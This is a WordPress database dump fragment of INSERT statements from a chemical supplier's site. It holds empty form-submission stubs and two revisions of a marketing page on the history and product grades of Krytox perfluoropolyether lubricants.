INSERT INTO `wp_posts` VALUES (3928, 598, '2017-03-28 21:20:35', '2017-03-28 21:20:35', '', '', '', 'publish', 'closed', 'closed', '', '3928', '', '', '2017-03-28 21:20:35', '2017-03-28 21:20:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3928/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3929, 0, '2017-03-29 08:22:30', '2017-03-29 08:22:30', '', '', '', 'publish', 'closed', 'closed', '', '3929', '', '', '2017-03-29 08:22:31', '2017-03-29 08:22:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3929/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3930, 0, '2017-03-29 12:33:38', '2017-03-29 12:33:38', '', '', '', 'publish', 'closed', 'closed', '', '3930', '', '', '2017-03-29 12:33:39', '2017-03-29 12:33:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3930/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3931, 0, '2017-03-29 14:13:02', '2017-03-29 14:13:02', '', '', '', 'publish', 'closed', 'closed', '', '3931', '', '', '2017-03-29 14:13:02', '2017-03-29 14:13:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/3931/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3933, 0, '2017-03-29 17:01:25', '2017-03-29 17:01:25', '', '', '', 'publish', 'closed', 'closed', '', '3933', '', '', '2017-03-29 17:01:25', '2017-03-29 17:01:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/3933/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3934, 0, '2017-03-29 17:10:10', '2017-03-29 17:10:10', '', '', '', 'publish', 'closed', 'closed', '', '3934', '', '', '2017-03-29 17:10:10', '2017-03-29 17:10:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3934/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3935, 0, '2017-03-29 17:12:10', '2017-03-29 17:12:10', '', '', '', 'publish', 'closed', 'closed', '', '3935', '', '', '2017-03-29 17:12:10', '2017-03-29 17:12:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3935/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3936, 0, '2017-03-30 05:55:18', '2017-03-30 05:55:18', '', '', '', 'publish', 'closed', 'closed', '', '3936', '', '', '2017-03-30 05:55:18', '2017-03-30 05:55:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3936/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3937, 0, '2017-03-30 08:51:23', '2017-03-30 08:51:23', '', '', '', 'publish', 'closed', 'closed', '', '3937', '', '', '2017-03-30 08:51:24', '2017-03-30 08:51:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3937/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3938, 0, '2017-03-30 09:55:55', '2017-03-30 09:55:55', '', '', '', 'publish', 'closed', 'closed', '', '3938', '', '', '2017-03-30 09:55:55', '2017-03-30 09:55:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3938/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3939, 0, '2017-03-30 10:06:54', '2017-03-30 10:06:54', '', '', '', 'publish', 'closed', 'closed', '', '3939', '', '', '2017-03-30 10:06:54', '2017-03-30 10:06:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3939/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3940, 0, '2017-03-30 13:41:29', '2017-03-30 13:41:29', '', '', '', 'publish', 'closed', 'closed', '', '3940', '', '', '2017-03-30 13:41:29', '2017-03-30 13:41:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3940/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3942, 0, '2017-03-30 17:41:43', '2017-03-30 17:41:43', '', '', '', 'publish', 'closed', 'closed', '', '3942', '', '', '2017-03-30 17:41:43', '2017-03-30 17:41:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3942/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3943, 0, '2017-03-31 02:47:59', '2017-03-31 02:47:59', '', '', '', 'publish', 'closed', 'closed', '', '3943', '', '', '2017-03-31 02:47:59', '2017-03-31 02:47:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3943/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3944, 2, '2017-03-31 12:30:00', '2017-03-31 12:30:00', '<h6 style="text-align: center;">[share title=""]</h6>\r\n<h3 style="text-align: center;">Krytox History &amp; Product Overview</h3>\r\nFor the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a>\r\n\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-03-31 12:30:00', '2017-03-31 12:30:00', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3945, 2, '2017-03-31 12:31:40', '2017-03-31 12:31:40', '<h6 style="text-align: center;">[share title=""]</h6>\r\n<h3 style="text-align: center;">Krytox History &amp; Product Overview</h3>\r\n<strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong>\r\n\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-03-31 12:31:40', '2017-03-31 12:31:40', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3946, 0, '2017-03-31 18:41:29', '2017-03-31 18:41:29', '', '', '', 'publish', 'closed', 'closed', '', '3946', '', '', '2017-03-31 18:41:29', '2017-03-31 18:41:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3946/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3947, 0, '2017-04-02 04:47:33', '2017-04-02 04:47:33', '', '', '', 'publish', 'closed', 'closed', '', '3947', '', '', '2017-04-02 04:47:33', '2017-04-02 04:47:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3947/', 0, 'nf_sub', '', 0); 
